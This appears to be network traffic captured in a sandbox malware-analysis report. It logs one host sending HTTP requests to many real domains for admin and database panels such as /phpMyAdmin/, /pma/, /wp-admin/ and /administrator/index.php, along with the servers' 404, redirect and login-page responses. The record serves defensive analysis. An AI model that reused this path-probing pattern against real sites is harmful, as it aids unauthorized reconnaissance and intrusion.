                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.749420881 CET97INData Raw: 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                445192.168.2.66343264.190.63.11180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.582190037 CET170OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.791523933 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                446192.168.2.663456185.51.191.4880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.599627018 CET181OUTGET /admin/w HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.987869978 CET1286INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=81af54a664f4ec74095989818025e221; expires=Tue, 06-Feb-2024 11:16:06 GMT; Max-Age=86400; path=/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; expires=Tue, 06-Feb-2024 11:16:07 GMT; Max-Age=86400
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Location: http://innovationdevelopment.eu/admin/w/login
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 64 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 74 69 74 6c 65 3e 49 6e 6e 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 79 73 74 65 6d 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6c 61 67 73 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6c 65 61 72 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 6e 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 0d 0a 09 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1d57<!DOCTYPE html><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http-equiv="Content-Type" content="text/ht
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.987909079 CET1286INData Raw: 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 6e 6e 6f 76 61 74 69 6f 6e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ml; charset=UTF-8" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/admin.css?v=1707131767" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/_custom_admin.css?v=1707131767" />...<link rel="s
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.987946033 CET1286INData Raw: 64 72 61 67 67 61 62 6c 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 6a 71
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: draggable.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.button.min.js"></script><script type="text/javascript" src="/js/jquery/ui/jquery.ui.dialog.min.js"></script><script type="text/javascript" src="/js
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.987997055 CET1286INData Raw: 6b 65 64 69 74 6f 72 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 63 6b 66 69 6e 64 65 72 5f 5f 5f 33 2f 63 6b 66 69 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: keditor.js"></script><script type="text/javascript" src="/js/ckfinder___3/ckfinder.js"></script><link rel="stylesheet" href="/js/jquery/timepicker/jquery-clockpicker.min.css"><script type="text/javascript" src="/js/jquery/timepicker/j
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.988033056 CET1286INData Raw: 61 72 65 61 2e 63 6b 65 64 69 74 6f 72 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 09 09 09 76 61 72 20 63 6b 69 64 3d 24 28 74 68 69 73 29 2e 61 74 74 72 28 27 69 64 27 29 3b 0d 0a 09 09 09 69 66 28 63 6b 69 64 3d 3d 27 27 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: area.ckeditor').each(function(){var ckid=$(this).attr('id');if(ckid=='' || typeof ckid==='undefined'){ckid="ck"+Math.random().toString(36).substring(7);$(this).attr('id',ckid);}var editor = CKEDITOR.replace( cki
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.988070011 CET1286INData Raw: 2f 61 3e 3c 64 69 76 20 69 64 3d 22 61 64 6d 69 6e 5f 73 69 64 65 74 69 74 6c 65 22 3e 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 64 69 76 20 69 64 3d 22 61 64 6d 69 6e 5f 73 69 64 65 74 69 74 6c 65 5f 72 69 67 68 74 22 3e 0d 0a 3c 73 65 6c 65 63 74 20 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: /a><div id="admin_sidetitle"></div><div id="admin_sidetitle_right"><select name="admin_language" class="admin_language" onChange="document.location.href='/admin/w/language/'+this.value;"><option value="hu" >Magyar</option><option
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.988106012 CET386INData Raw: 74 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: t;});</script></div></div><div class="clear"></div><div id="footer"><footer><div id="help_footer"></div><br><br><br><br><br><br><br><br><br></footer></div><div class="clear"></div></div></div><div class="
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.995263100 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                447192.168.2.66348864.190.63.13680
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.617816925 CET275OUTGET /wp-admin/?sub1=20240205-2216-072b-880c-130055c7e3e5 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://followerstiktok.xyz/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.830460072 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                448192.168.2.66359754.183.63.24180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.622725964 CET173OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.802124977 CET801INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=a1aabfac7a1f7e8705602ed881881037; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=a1aabfac7a1f7e8705602ed881881037; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                location: https://pt.secure.imvu.com/admin/
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: wAlCVNwbZTyn9wAcv6C2dfR2yGwB28t
                                                                                                                                                                                                                                                                                                                                                                X-Server: Smartling
                                                                                                                                                                                                                                                                                                                                                                X-SL-Notranslate: 1
                                                                                                                                                                                                                                                                                                                                                                X-SL-Norewrite: 1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                449192.168.2.66355464.190.63.13680
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.648137093 CET220OUTGET /pma/?sub1=20240205-2216-0720-8b5f-fc43330f6951 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww16.followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.858345985 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                450192.168.2.66359864.190.63.11180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.674868107 CET164OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.885473013 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                451192.168.2.66356931.216.144.580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.737652063 CET204OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mega.nz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://mega.nz/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.937711000 CET195INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Location: https://mega.nz
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: MEGA-Chrome-Antileak
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Max-Age: 86400


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                452192.168.2.66377964.91.249.2080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.756752968 CET166OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.911798954 CET349INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Location: http://ww7.chainmine.io/pma/?usid=27&utid=4923817350
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                453192.168.2.663680185.120.71.2680
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.769515991 CET189OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: www.analvids.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.979180098 CET394INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.analvids.com/administrator/index.php
